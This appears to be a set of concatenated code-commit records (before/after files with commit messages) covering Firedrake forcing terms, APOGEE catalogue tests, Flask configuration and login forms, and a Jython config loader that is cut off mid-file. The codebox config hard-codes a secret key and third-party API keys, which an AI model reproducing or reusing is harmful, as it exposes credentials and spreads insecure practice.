        return -coriolis*inner(self.test, self.state.perp(u0))*dx
    def pressure_gradient_term(self):
        """g*grad(D), integrated by parts with upwinded facet fluxes."""
        u0, D0 = split(self.x0)
        g = self.state.parameters.g
        n = FacetNormal(self.state.mesh)
        # upwind value of the normal velocity on each interior facet
        un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
        cell_part = div(self.test)*D0*dx
        facet_part = inner(jump(self.test, n),
                           un('+')*D0('+') - un('-')*D0('-'))*dS
        return g*(cell_part - facet_part)
    def topography_term(self):
        """g*grad(b) for the bottom topography b, upwinded as above."""
        u0 = split(self.x0)[0]
        g = self.state.parameters.g
        topo = self.state.fields("topography")
        n = FacetNormal(self.state.mesh)
        un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
        cell_part = g*div(self.test)*topo*dx
        facet_part = g*inner(jump(self.test, n),
                             un('+')*topo('+') - un('-')*topo('-'))*dS
        return cell_part - facet_part
class NoForcing(Forcing):
    """Forcing class that applies no forcing: x_out is a copy of x_in."""
    def pressure_gradient_term(self):
        # satisfy the abstract method; there are no forcing terms at all
        return 0
    def _build_forcing_solvers(self):
        # BUG FIX: this override was named `_build_forcing_solver` (no
        # trailing 's'), so the base __init__ still called the inherited
        # `_build_forcing_solvers` and tried to build an unused solver
        pass
    def apply(self, scale, x_in, x_nl, x_out, **kwargs):
        # ignore scale and x_nl entirely; just copy the input state through
        x_out.assign(x_in)
Add scaling to the theta forcing term.
from abc import ABCMeta, abstractmethod
from firedrake import Function, split, TrialFunction, TestFunction, \
FacetNormal, inner, dx, cross, div, jump, avg, dS_v, \
DirichletBC, LinearVariationalProblem, LinearVariationalSolver, \
dot, dS, Constant, warning, as_vector, SpatialCoordinate
__all__ = ["CompressibleForcing", "IncompressibleForcing", "EadyForcing", "CompressibleEadyForcing", "ShallowWaterForcing", "NoForcing", "exner", "exner_rho", "exner_theta"]
class Forcing(object, metaclass=ABCMeta):
    """
    Base class for forcing terms for Gusto.
    :arg state: x :class:`.State` object.
    :arg euler_poincare: if True then the momentum equation is in Euler
    Poincare form and we need to add 0.5*grad(u^2) to the forcing term.
    If False then this term is not added.
    :arg linear: if True then we are solving a linear equation so nonlinear
    terms (namely the Euler Poincare term) should not be added.
    :arg extra_terms: extra terms to add to the u component of the forcing
    term - these will be multiplied by the appropriate test function.
    :arg moisture: optional collection of moisture quantities used by
    subclasses -- presumably fields; TODO confirm the expected type.
    """
    def __init__(self, state, euler_poincare=True, linear=False, extra_terms=None, moisture=None):
        self.state = state
        if linear:
            # the Euler-Poincare term is nonlinear, so drop it for linear runs
            self.euler_poincare = False
            warning('Setting euler_poincare to False because you have set linear=True')
        else:
            self.euler_poincare = euler_poincare
        # set up functions
        self.Vu = state.spaces("HDiv")
        # this is the function that the forcing term is applied to
        self.x0 = Function(state.W)
        self.test = TestFunction(self.Vu)
        self.trial = TrialFunction(self.Vu)
        # this is the function that contains the result of solving
        # <test, trial> = <test, F(x0)>, where F is the forcing term
        self.uF = Function(self.Vu)
        # find out which terms we need
        self.extruded = self.Vu.extruded
        self.coriolis = state.Omega is not None or hasattr(state.fields, "coriolis")
        self.sponge = state.mu is not None
        self.topography = hasattr(state.fields, "topography")
        self.extra_terms = extra_terms
        self.moisture = moisture
        # some constants to use for scaling terms
        self.scaling = Constant(1.)
        self.mu_scaling = Constant(1.)
        self._build_forcing_solvers()
    def mass_term(self):
        # mass matrix used to project the forcing onto Vu
        return inner(self.test, self.trial)*dx
    def coriolis_term(self):
        # -test . (2*Omega x u); overridden by ShallowWaterForcing
        u0 = split(self.x0)[0]
        return -inner(self.test, cross(2*self.state.Omega, u0))*dx
    def sponge_term(self):
        # damping of the vertical velocity component by the profile mu
        u0 = split(self.x0)[0]
        return self.state.mu*inner(self.test, self.state.k)*inner(u0, self.state.k)*dx
    def euler_poincare_term(self):
        # -0.5*div(test)*|u|^2, i.e. 0.5*grad(u^2) integrated by parts
        u0 = split(self.x0)[0]
        return -0.5*div(self.test)*inner(u0, u0)*dx
    @abstractmethod
    def pressure_gradient_term(self):
        # must be provided by each equation-specific subclass
        pass
    def forcing_term(self):
        """Assemble the scaled sum of all active forcing terms."""
        L = self.pressure_gradient_term()
        if self.extruded:
            # gravity only applies on extruded (vertical-direction) meshes
            L += self.gravity_term()
        if self.coriolis:
            L += self.coriolis_term()
        if self.euler_poincare:
            L += self.euler_poincare_term()
        if self.topography:
            L += self.topography_term()
        if self.extra_terms is not None:
            L += inner(self.test, self.extra_terms)*dx
        # scale L
        L = self.scaling * L
        # sponge term has a separate scaling factor as it is always implicit
        if self.sponge:
            L -= self.mu_scaling*self.sponge_term()
        return L
    def _build_forcing_solvers(self):
        """Build the linear solver that projects the forcing into Vu."""
        a = self.mass_term()
        L = self.forcing_term()
        if self.Vu.extruded:
            # no normal flow through top and bottom of the domain
            bcs = [DirichletBC(self.Vu, 0.0, "bottom"),
                   DirichletBC(self.Vu, 0.0, "top")]
        else:
            bcs = None
        u_forcing_problem = LinearVariationalProblem(
            a, L, self.uF, bcs=bcs
        )
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """
        Function takes x as input, computes F(x_nl) and returns
        x_out = x + scale*F(x_nl)
        as output.
        :arg x_in: :class:`.Function` object
        :arg x_nl: :class:`.Function` object
        :arg x_out: :class:`.Function` object
        :arg mu_alpha: scale for sponge term, if present
        """
        self.scaling.assign(scaling)
        self.x0.assign(x_nl)
        mu_scaling = kwargs.get("mu_alpha")
        if mu_scaling is not None:
            self.mu_scaling.assign(mu_scaling)
        self.u_forcing_solver.solve() # places forcing in self.uF
        uF = x_out.split()[0]
        x_out.assign(x_in)
        uF += self.uF
class CompressibleForcing(Forcing):
    """
    Forcing class for compressible Euler equations.
    """
    def pressure_gradient_term(self):
        """cp*theta*grad(pi) pressure gradient, integrated by parts over
        cells with an average-Exner flux on vertical interior facets."""
        u0, rho0, theta0 = split(self.x0)
        cp = self.state.parameters.cp
        n = FacetNormal(self.state.mesh)
        # introduce density potential temp
        theta_rho = Function(theta0.function_space()).assign(theta0)
        # adjust density potential temp for moisture species
        if self.moisture is not None:
            water_t = Function(theta0.function_space())
            # BUG FIX: was `for water in moisture` -- `moisture` is not a
            # local name here, the constructor stores it on the instance
            for water in self.moisture:
                water_t += water
            theta_rho = theta_rho / (1 + water_t)
        pi = exner(theta0, rho0, self.state)
        L = (
            + cp*div(theta_rho*self.test)*pi*dx
            - cp*jump(self.test*theta_rho, n)*avg(pi)*dS_v
        )
        return L
    def gravity_term(self):
        """Gravity as either a geopotential gradient or -g*k."""
        if self.state.geopotential_form:
            L = div(self.test)*self.state.Phi*dx
        else:
            g = self.state.parameters.g
            L = -g*inner(self.test, self.state.k)*dx
        return L
    def theta_forcing(self):
        """Moist correction to theta driven by the velocity divergence."""
        cv = self.state.parameters.cv
        # BUG FIX: cp was read below but never bound, raising NameError
        cp = self.state.parameters.cp
        c_vv = self.state.parameters.c_vv
        c_pv = self.state.parameters.c_pv
        c_pl = self.state.parameters.c_pl
        R_d = self.state.parameters.R_d
        R_v = self.state.parameters.R_v
        u0, _, theta0 = split(self.x0)
        water_v = self.state.fields('water_v')
        water_c = self.state.fields('water_c')
        # moist heat capacities and gas constant
        c_vml = cv + water_v * c_vv + water_c * c_pl
        c_pml = cp + water_v * c_pv + water_c * c_pl
        R_m = R_d + water_v * R_v
        L = -theta0 * (R_m / c_vml - (R_d * c_pml) / (cp * c_vml)) * div(u0)
        return self.scaling * L
    def _build_forcing_solvers(self):
        super(CompressibleForcing, self)._build_forcing_solvers()
        if self.moisture is not None:
            _, _, theta0 = split(self.x0)
            Vt = theta0.function_space()
            p = TrialFunction(Vt)
            q = TestFunction(Vt)
            self.theta_new = Function(Vt)
            a = p * q * dx
            # BUG FIX: was `q * dx * self.theta_forcing()`; the measure dx
            # must multiply the whole integrand, it cannot sit mid-product
            L = q * self.theta_forcing() * dx
            theta_problem = LinearVariationalProblem(a, L, self.theta_new)
            self.theta_solver = LinearVariationalSolver(theta_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """Apply the velocity forcing, then (for moist compressible runs)
        update theta from the moist divergence forcing."""
        super(CompressibleForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
        if 'compressible' in kwargs and kwargs['compressible']:
            if self.moisture is not None:
                _, _, theta_out = x_out.split()
                self.theta_solver.solve()
                # NOTE(review): this overwrites theta_out with the projected
                # forcing rather than incrementing it -- confirm += is not
                # intended
                theta_out.assign(self.theta_new)
def exner(theta, rho, state):
    """
    Compute the exner function.
    """
    prm = state.parameters
    g = prm.kappa/(1 - prm.kappa)
    return (prm.R_d/prm.p_0)**g * pow(rho*theta, g)
def exner_rho(theta, rho, state):
    """Return the derivative of the Exner function with respect to rho."""
    prm = state.parameters
    g = prm.kappa/(1 - prm.kappa)
    # d/drho[(rho*theta)^g] = g * theta * (rho*theta)^(g-1)
    return (prm.R_d/prm.p_0)**g * pow(rho*theta, g - 1) * theta * g
def exner_theta(theta, rho, state):
    """Return the derivative of the Exner function with respect to theta."""
    prm = state.parameters
    g = prm.kappa/(1 - prm.kappa)
    # d/dtheta[(rho*theta)^g] = g * rho * (rho*theta)^(g-1)
    return (prm.R_d/prm.p_0)**g * pow(rho*theta, g - 1) * rho * g
class IncompressibleForcing(Forcing):
    """
    Forcing class for incompressible Euler Boussinesq equations.

    Supplies the pressure-gradient and buoyancy terms for the velocity
    forcing, plus a projection of div(u) into the pressure space used to
    reset the pressure when requested.
    """
    def pressure_gradient_term(self):
        # integrated-by-parts pressure gradient: div(test)*p
        _, p0, _ = split(self.x0)
        L = div(self.test)*p0*dx
        return L
    def gravity_term(self):
        # buoyancy acting along the vertical unit vector k
        _, _, b0 = split(self.x0)
        L = b0*inner(self.test, self.state.k)*dx
        return L
    def _build_forcing_solvers(self):
        super(IncompressibleForcing, self)._build_forcing_solvers()
        # additionally build the projection of div(u0) into the DG
        # pressure space, consumed by apply()
        Vp = self.state.spaces("DG")
        p = TrialFunction(Vp)
        q = TestFunction(Vp)
        self.divu = Function(Vp)
        u0, _, _ = split(self.x0)
        a = p*q*dx
        L = q*div(u0)*dx
        divergence_problem = LinearVariationalProblem(
            a, L, self.divu)
        self.divergence_solver = LinearVariationalSolver(divergence_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """Apply the velocity forcing; if the 'incompressible' kwarg is
        truthy, overwrite the pressure with the projection of div(u0)."""
        super(IncompressibleForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
        if 'incompressible' in kwargs and kwargs['incompressible']:
            _, p_out, _ = x_out.split()
            self.divergence_solver.solve()
            p_out.assign(self.divu)
class EadyForcing(IncompressibleForcing):
    """
    Forcing class for Eady Boussinesq equations.

    Extends the incompressible forcing with terms proportional to the
    background buoyancy gradient dbdy in the u and b equations.
    """
    def forcing_term(self):
        L = Forcing.forcing_term(self)
        dbdy = self.state.parameters.dbdy
        H = self.state.parameters.H
        Vp = self.state.spaces("DG")
        _, _, z = SpatialCoordinate(self.state.mesh)
        # z - H/2: height measured from the mid-level of the domain
        eady_exp = Function(Vp).interpolate(z-H/2.)
        # Eady forcing acting on the y-component of the velocity
        L -= self.scaling*dbdy*eady_exp*inner(self.test, as_vector([0., 1., 0.]))*dx
        return L
    def _build_forcing_solvers(self):
        super(EadyForcing, self)._build_forcing_solvers()
        # b_forcing: projection of -dbdy*v into the buoyancy space
        dbdy = self.state.parameters.dbdy
        Vb = self.state.spaces("HDiv_v")
        F = TrialFunction(Vb)
        gamma = TestFunction(Vb)
        self.bF = Function(Vb)
        u0, _, b0 = split(self.x0)
        a = gamma*F*dx
        L = -self.scaling*gamma*(dbdy*inner(u0, as_vector([0., 1., 0.])))*dx
        b_forcing_problem = LinearVariationalProblem(
            a, L, self.bF
        )
        self.b_forcing_solver = LinearVariationalSolver(b_forcing_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """Apply the velocity forcing, then add the buoyancy forcing."""
        super(EadyForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
        self.b_forcing_solver.solve()  # places forcing in self.bF
        _, _, b_out = x_out.split()
        b_out += self.bF
class CompressibleEadyForcing(CompressibleForcing):
    """
    Forcing class for compressible Eady equations.

    Extends the compressible forcing with terms proportional to the
    background theta gradient dthetady in the u and theta equations.
    """
    def forcing_term(self):
        # L = super(EadyForcing, self).forcing_term()
        L = Forcing.forcing_term(self)
        dthetady = self.state.parameters.dthetady
        Pi0 = self.state.parameters.Pi0
        cp = self.state.parameters.cp
        _, rho0, theta0 = split(self.x0)
        Pi = exner(theta0, rho0, self.state)
        Pi_0 = Constant(Pi0)
        # deviation of Exner pressure from the reference Pi0 drives the
        # y-component of the velocity
        L += self.scaling*cp*dthetady*(Pi-Pi_0)*inner(self.test, as_vector([0., 1., 0.]))*dx  # Eady forcing
        return L
    def _build_forcing_solvers(self):
        super(CompressibleEadyForcing, self)._build_forcing_solvers()
        # theta_forcing: projection of -dthetady*v into the theta space
        dthetady = self.state.parameters.dthetady
        Vt = self.state.spaces("HDiv_v")
        F = TrialFunction(Vt)
        gamma = TestFunction(Vt)
        self.thetaF = Function(Vt)
        u0, _, _ = split(self.x0)
        a = gamma*F*dx
        L = -self.scaling*gamma*(dthetady*inner(u0, as_vector([0., 1., 0.])))*dx
        theta_forcing_problem = LinearVariationalProblem(
            a, L, self.thetaF
        )
        self.theta_forcing_solver = LinearVariationalSolver(theta_forcing_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        # call Forcing.apply directly, bypassing CompressibleForcing's
        # moist theta update, then add the Eady theta forcing
        Forcing.apply(self, scaling, x_in, x_nl, x_out, **kwargs)
        self.theta_forcing_solver.solve()  # places forcing in self.thetaF
        _, _, theta_out = x_out.split()
        theta_out += self.thetaF
class ShallowWaterForcing(Forcing):
    """Forcing terms for the rotating shallow water equations."""
    def coriolis_term(self):
        # -f * test . perp(u) with the spatially varying Coriolis field f
        f = self.state.fields("coriolis")
        u0, _ = split(self.x0)
        L = -f*inner(self.test, self.state.perp(u0))*dx
        return L
    def pressure_gradient_term(self):
        # g*grad(D), integrated by parts with upwinded facet fluxes
        g = self.state.parameters.g
        u0, D0 = split(self.x0)
        n = FacetNormal(self.state.mesh)
        # upwind value of the normal velocity on each interior facet
        un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
        L = g*(div(self.test)*D0*dx
               - inner(jump(self.test, n), un('+')*D0('+')
                       - un('-')*D0('-'))*dS)
        return L
    def topography_term(self):
        # g*grad(b) for the bottom topography b, upwinded as above
        g = self.state.parameters.g
        u0, _ = split(self.x0)
        b = self.state.fields("topography")
        n = FacetNormal(self.state.mesh)
        un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
        L = g*div(self.test)*b*dx - g*inner(jump(self.test, n), un('+')*b('+') - un('-')*b('-'))*dS
        return L
class NoForcing(Forcing):
    """Forcing class that applies no forcing: x_out is a copy of x_in."""
    def pressure_gradient_term(self):
        # satisfy the abstract method; there are no forcing terms at all
        return 0
    def _build_forcing_solvers(self):
        # BUG FIX: this override was named `_build_forcing_solver` (no
        # trailing 's'), so the base __init__ still called the inherited
        # `_build_forcing_solvers` and tried to build an unused solver
        pass
    def apply(self, scale, x_in, x_nl, x_out, **kwargs):
        # ignore scale and x_nl entirely; just copy the input state through
        x_out.assign(x_in)
|
import numpy
import apogee.tools.read as apread
from apogee.tools import bitmask
_DATA= apread.allStar(raw=True) #such that we can re-use it in different tests
from _util import known_failure
def test_telescope():
    """Check the TELESCOPE tag is consistent with APSTAR_ID for 1m data."""
    #Test the telescope tag against the APSTAR_ID
    onemIndx= numpy.array(['apogee.apo1m' in s for s in _DATA['APSTAR_ID']])
    telescopeIndx= numpy.array(['apo1m' in d for d in _DATA['TELESCOPE']],
                               dtype='bool')
    # BUG FIX: `True-boolarray` raises TypeError on numpy >= 1.13 (boolean
    # subtract removed); use logical negation instead
    assert numpy.sum(onemIndx*(~telescopeIndx)) == 0,\
        'TELESCOPE tag does not correspond to APSTAR_ID for 1m data'
    return None
def test_targflags_apogee_target1():
    # Test that TARGFLAGS corresponds to the bits in APOGEE_TARGET
    # BUG FIX: Python 3 range objects have no pop(); materialise as a list
    targ1bits= list(range(31)) #don't check 31, bc always set
    targ1bits.pop(14) #14 not populated
    for targbit in targ1bits:
        name= bitmask.apogee_target1_string(targbit)
        targindx= numpy.array([name in s for s in _DATA['TARGFLAGS']],
                              dtype='bool')
        if targbit == 0:
            # APOGEE_FAINT (bit 0) substring-matches APOGEE_FAINT_EXTRA,
            # so exclude the latter explicitly
            targindx*= \
                numpy.array(['APOGEE_FAINT_EXTRA' not in s for s in _DATA['TARGFLAGS']],
                            dtype='bool')
        # BUG FIX: ~ instead of True- (boolean subtract removed in numpy >= 1.13)
        badindx= ((_DATA['APOGEE_TARGET1'] & 2**targbit) != 0)*(~targindx)
        assert numpy.sum(badindx) == 0, 'Some objects with bit %i set in apogee_target1 do not have the corresponding flag name in TARGFLAGS set' % targbit
    return None
def test_targflags_apogee_target2():
    # Test that TARGFLAGS corresponds to the bits in APOGEE_TARGET
    # only these apogee_target2 bits are populated
    targ2bits= [1,2,3,4,9,10,11,12,13,14,15,16,17]
    for targbit in targ2bits:
        name= bitmask.apogee_target2_string(targbit)
        targindx= numpy.array([name in s for s in _DATA['TARGFLAGS']],
                              dtype='bool')
        # BUG FIX: ~ instead of True- (boolean subtract removed in numpy >= 1.13)
        badindx= ((_DATA['APOGEE_TARGET2'] & 2**targbit) != 0)*(~targindx)
        assert numpy.sum(badindx) == 0, 'Some objects with bit %i set in apogee_target2 do not have the corresponding flag name in TARGFLAGS set' % targbit
    return None
@known_failure
def test_extratarg():
    #Test that extratarg tag is
    # 0 for main survey targets,
    # 1 for commissioning (bit 1)
    # 2 for tellurics (bit 2)
    mainIndx= (((_DATA['APOGEE_TARGET1'] & 2**11) != 0)\
                   +((_DATA['APOGEE_TARGET1'] & 2**12) != 0)
               +((_DATA['APOGEE_TARGET1'] & 2**13) != 0))
    assert numpy.sum(mainIndx*(_DATA['EXTRATARG'] != 0)) == 0, '%i main survey targets have EXTRATARG neq 0' % numpy.sum(mainIndx*_DATA['EXTRATARG'] > 0)
    commIndx= _DATA['COMMISS'] == 1
    commBitSet= numpy.array([bitmask.bit_set(1,e) for e in _DATA['EXTRATARG']],
                            dtype='bool')
    # BUG FIXES: ~ instead of True- (boolean subtract removed in numpy >=
    # 1.13), and the stray trailing `== 0` in the message is removed -- %
    # binds tighter than ==, so the message evaluated to the boolean False
    assert numpy.sum(commIndx*(~commBitSet)) == 0, '%i commissioning targets do not have bit 1 in EXTRATARG set' % numpy.sum(commIndx*(~commBitSet))
    tellIndx= (_DATA['APOGEE_TARGET2'] & 2**9) != 0
    tellBitSet= numpy.array([bitmask.bit_set(2,e) for e in _DATA['EXTRATARG']],
                            dtype='bool')
    assert numpy.sum(tellIndx*(~tellBitSet)) == 0, '%i telluric targets do not have bit 2 in EXTRATARG set' % numpy.sum(tellIndx*(~tellBitSet))
    return None
Test whether the named PARAM tags agree with the PARAM array.
import numpy
import apogee.tools.read as apread
from apogee.tools import bitmask, paramIndx, elemIndx
_DATA= apread.allStar(raw=True) #such that we can re-use it in different tests
from _util import known_failure
def test_telescope():
    """Check the TELESCOPE tag is consistent with APSTAR_ID for 1m data."""
    #Test the telescope tag against the APSTAR_ID
    onemIndx= numpy.array(['apogee.apo1m' in s for s in _DATA['APSTAR_ID']])
    telescopeIndx= numpy.array(['apo1m' in d for d in _DATA['TELESCOPE']],
                               dtype='bool')
    # BUG FIX: `True-boolarray` raises TypeError on numpy >= 1.13 (boolean
    # subtract removed); use logical negation instead
    assert numpy.sum(onemIndx*(~telescopeIndx)) == 0,\
        'TELESCOPE tag does not correspond to APSTAR_ID for 1m data'
    return None
def test_targflags_apogee_target1():
    # Test that TARGFLAGS corresponds to the bits in APOGEE_TARGET
    # BUG FIX: Python 3 range objects have no pop(); materialise as a list
    targ1bits= list(range(31)) #don't check 31, bc always set
    targ1bits.pop(14) #14 not populated
    for targbit in targ1bits:
        name= bitmask.apogee_target1_string(targbit)
        targindx= numpy.array([name in s for s in _DATA['TARGFLAGS']],
                              dtype='bool')
        if targbit == 0:
            # APOGEE_FAINT (bit 0) substring-matches APOGEE_FAINT_EXTRA,
            # so exclude the latter explicitly
            targindx*= \
                numpy.array(['APOGEE_FAINT_EXTRA' not in s for s in _DATA['TARGFLAGS']],
                            dtype='bool')
        # BUG FIX: ~ instead of True- (boolean subtract removed in numpy >= 1.13)
        badindx= ((_DATA['APOGEE_TARGET1'] & 2**targbit) != 0)*(~targindx)
        assert numpy.sum(badindx) == 0, 'Some objects with bit %i set in apogee_target1 do not have the corresponding flag name in TARGFLAGS set' % targbit
    return None
def test_targflags_apogee_target2():
    # Test that TARGFLAGS corresponds to the bits in APOGEE_TARGET
    # only these apogee_target2 bits are populated
    targ2bits= [1,2,3,4,9,10,11,12,13,14,15,16,17]
    for targbit in targ2bits:
        name= bitmask.apogee_target2_string(targbit)
        targindx= numpy.array([name in s for s in _DATA['TARGFLAGS']],
                              dtype='bool')
        # BUG FIX: ~ instead of True- (boolean subtract removed in numpy >= 1.13)
        badindx= ((_DATA['APOGEE_TARGET2'] & 2**targbit) != 0)*(~targindx)
        assert numpy.sum(badindx) == 0, 'Some objects with bit %i set in apogee_target2 do not have the corresponding flag name in TARGFLAGS set' % targbit
    return None
@known_failure
def test_extratarg():
    #Test that extratarg tag is
    # 0 for main survey targets,
    # 1 for commissioning (bit 1)
    # 2 for tellurics (bit 2)
    mainIndx= (((_DATA['APOGEE_TARGET1'] & 2**11) != 0)\
                   +((_DATA['APOGEE_TARGET1'] & 2**12) != 0)
               +((_DATA['APOGEE_TARGET1'] & 2**13) != 0))
    assert numpy.sum(mainIndx*(_DATA['EXTRATARG'] != 0)) == 0, '%i main survey targets have EXTRATARG neq 0' % numpy.sum(mainIndx*_DATA['EXTRATARG'] > 0)
    commIndx= _DATA['COMMISS'] == 1
    commBitSet= numpy.array([bitmask.bit_set(1,e) for e in _DATA['EXTRATARG']],
                            dtype='bool')
    # BUG FIXES: ~ instead of True- (boolean subtract removed in numpy >=
    # 1.13), and the stray trailing `== 0` in the message is removed -- %
    # binds tighter than ==, so the message evaluated to the boolean False
    assert numpy.sum(commIndx*(~commBitSet)) == 0, '%i commissioning targets do not have bit 1 in EXTRATARG set' % numpy.sum(commIndx*(~commBitSet))
    tellIndx= (_DATA['APOGEE_TARGET2'] & 2**9) != 0
    tellBitSet= numpy.array([bitmask.bit_set(2,e) for e in _DATA['EXTRATARG']],
                            dtype='bool')
    assert numpy.sum(tellIndx*(~tellBitSet)) == 0, '%i telluric targets do not have bit 2 in EXTRATARG set' % numpy.sum(tellIndx*(~tellBitSet))
    return None
def test_params_named():
    #Test that the named tags correspond to the correct values in param according to PARAM_SYMBOL
    assert numpy.all(numpy.fabs(_DATA['PARAM'][:,paramIndx('teff')]
                                -_DATA['TEFF']) < 10.**-10.), 'PARAM TEFF does not correspond to tag TEFF'
    assert numpy.all(numpy.fabs(_DATA['PARAM'][:,paramIndx('logg')]
                                -_DATA['LOGG']) < 10.**-10.), 'PARAM LOGG does not correspond to tag LOGG'
    # BUG FIX: ~ instead of True- (boolean subtract removed in numpy >= 1.13);
    # mask out entries whose covariance diagonal is NaN before comparing
    cnanIndx= ~numpy.isnan(numpy.sqrt(_DATA['PARAM_COV'][:,paramIndx('teff'),paramIndx('teff')]))
    if numpy.sum(cnanIndx) > 0:
        assert numpy.all(numpy.fabs(numpy.sqrt(_DATA['PARAM_COV'][cnanIndx,paramIndx('teff'),paramIndx('teff')])
                                    -_DATA['TEFF_ERR'][cnanIndx]) < 10.**-10.), 'PARAM_COV TEFF does not correspond to tag TEFF_ERR'
    cnanIndx= ~numpy.isnan(numpy.sqrt(_DATA['PARAM_COV'][:,paramIndx('logg'),paramIndx('logg')]))
    if numpy.sum(cnanIndx) > 0:
        assert numpy.all(numpy.fabs(numpy.sqrt(_DATA['PARAM_COV'][cnanIndx,paramIndx('logg'),paramIndx('logg')])
                                    -_DATA['LOGG_ERR'][cnanIndx]) < 10.**-10.), 'PARAM_COV LOGG does not correspond to tag LOGG_ERR'
    return None
|
"""
codebox.conf
~~~~~~~~~~~
:copyright: (c) 2011 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import os, os.path
class Config(object):
    """Base application configuration for codebox."""
    # Flask debug mode; should be disabled in production.
    DEBUG = True
    TESTING = False
    # NOTE(review): secret key and third-party API credentials are hard-coded
    # in source; consider loading them from environment variables.
    SECRET_KEY = '\x89\x1d\xec\x8eJ\xda=C`\xf3<X\x81\xff\x1e\r{+\x1b\xe1\xd1@ku'
    REDIS_DB = 0
    JANRAIN_API_KEY = '288a1ca2fedb4e1d1780c320fa4082ae69640a52'
    PODIO_CLIENT_ID = "dcramer@gmail.com"
    PODIO_KEY = "f7qFIBcPTfTBLOd8ondkO9UGqU6uN1iG"
    # Webmail domains that are rejected (presumably as organization domains --
    # TODO confirm against the code that consumes this list).
    DOMAIN_BLACKLIST = ['gmail.com', 'hotmail.com', 'live.com', 'msn.com', 'yahoo.com', 'googlemail.com', 'facebookmail.com']
class TestingConfig(Config):
    """Configuration overrides used by the test suite."""
    # Separate Redis database so tests never touch live data.
    REDIS_DB = 9
    TESTING = True
Handle configuration from Heroku
"""
codebox.conf
~~~~~~~~~~~
:copyright: (c) 2011 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import os, os.path
import urlparse
class Config(object):
    """Base application configuration for codebox."""
    # Flask debug mode; should be disabled in production.
    DEBUG = True
    TESTING = False
    # NOTE(review): secret key and third-party API credentials are hard-coded
    # in source; consider loading them from environment variables.
    SECRET_KEY = '\x89\x1d\xec\x8eJ\xda=C`\xf3<X\x81\xff\x1e\r{+\x1b\xe1\xd1@ku'
    REDIS_DB = 0
    JANRAIN_API_KEY = '288a1ca2fedb4e1d1780c320fa4082ae69640a52'
    PODIO_CLIENT_ID = "dcramer@gmail.com"
    PODIO_KEY = "f7qFIBcPTfTBLOd8ondkO9UGqU6uN1iG"
    # Webmail domains that are rejected (presumably as organization domains --
    # TODO confirm against the code that consumes this list).
    DOMAIN_BLACKLIST = ['gmail.com', 'hotmail.com', 'live.com', 'msn.com', 'yahoo.com', 'googlemail.com', 'facebookmail.com']
# Heroku (Redis To Go) support: when REDISTOGO_URL is present, parse it and
# override the Redis connection settings on Config.
# The URL looks like 'redis://username:password@my.host:6789'.
# Fix: dict.has_key() is deprecated (and gone in Python 3); use 'in'.
if 'REDISTOGO_URL' in os.environ:
    # Teach urlparse that redis:// URLs carry a network location part.
    urlparse.uses_netloc.append('redis')
    url = urlparse.urlparse(os.environ['REDISTOGO_URL'])
    Config.REDIS_USER = url.username
    Config.REDIS_PASSWORD = url.password
    Config.REDIS_HOST = url.hostname
    Config.REDIS_PORT = url.port
class TestingConfig(Config):
    """Configuration overrides used by the test suite."""
    # Separate Redis database so tests never touch live data.
    REDIS_DB = 9
    TESTING = True
|
from flask.ext.wtf import Form
from wtforms import TextField, BooleanField
from wtforms.validators import Required
class LoginForm(Form):
    """OpenID login form: an OpenID URL plus a remember-me flag."""
    openid = TextField('openid', validators = [Required()])
    remember_me = BooleanField('remember_me', default = False)
Made the openid field a hidden field, so that the user does not have to input it
from flask.ext.wtf import Form
from wtforms import HiddenField, BooleanField
from wtforms.validators import Required
class LoginForm(Form):
    """OpenID login form.

    The OpenID endpoint is a hidden field pre-set to Google's OpenID
    endpoint so the user does not have to type it.
    """
    openid = HiddenField('openid', validators = [Required()], default = "https://www.google.com/accounts/o8/id")
    remember_me = BooleanField('remember_me', default = False)
#!/usr/bin/env jython
import os
import ConfigParser
import logging
log = logging.getLogger('kahuna')
class Config:
    """ Main configuration.

    Loads connection settings from the first configuration file found,
    searching the user config first, then /etc, then /usr/local/etc.

    Raises IOError when no configuration file can be located.
    """
    def __init__(self):
        config = ConfigParser.SafeConfigParser()
        # Fallback path used when none of the candidate files exists.
        configFound = "/tmp/kahuna.conf"
        # User config has precedence, then system, then /usr/local
        files = [os.environ['HOME'] + '/.kahuna.conf', '/etc/kahuna.conf', '/usr/local/etc/kahuna.conf']
        # Renamed loop variable: 'file' shadowed the builtin.
        for candidate in files:
            if os.path.exists(candidate):
                log.debug("Config found in %s" % candidate)
                configFound = candidate
                break
        if not os.path.exists(configFound):
            log.error("Kahuna config file not found.")
            raise IOError("Configuration file not found. " +
                    "Please, make sure that $HOME/.kahuna.conf or /etc/kahuna.conf exists")
        # Bug fix: read the file that was actually located. The previous code
        # passed the loop variable, which after an unsuccessful search pointed
        # at the last candidate instead of the fallback path. (A leftover
        # debug log of os.path.exists() was also removed.)
        config.read(configFound)
        self.address = config.get("connection", "address")
        self.user = config.get("connection", "user")
        self.password = config.get("connection", "pass")
* set default config to user config
#!/usr/bin/env jython
import os
import ConfigParser
import logging
log = logging.getLogger('kahuna')
class Config:
    """ Main configuration.

    Loads connection settings from the first configuration file found,
    searching the user config first, then /etc, then /usr/local/etc.

    Raises IOError when no configuration file can be located.
    """
    def __init__(self):
        config = ConfigParser.SafeConfigParser()
        # Fallback path used when none of the candidate files exists.
        # NOTE(review): HOME + "/tmp/kahuna.conf" (a tmp dir inside $HOME)
        # looks odd -- confirm this default is intentional.
        configFound = os.environ['HOME'] + "/tmp/kahuna.conf"
        # User config has precedence, then system, then /usr/local
        files = [os.environ['HOME'] + '/.kahuna.conf', '/etc/kahuna.conf', '/usr/local/etc/kahuna.conf']
        # Renamed loop variable: 'file' shadowed the builtin.
        for candidate in files:
            if os.path.exists(candidate):
                log.debug("Config found in %s" % candidate)
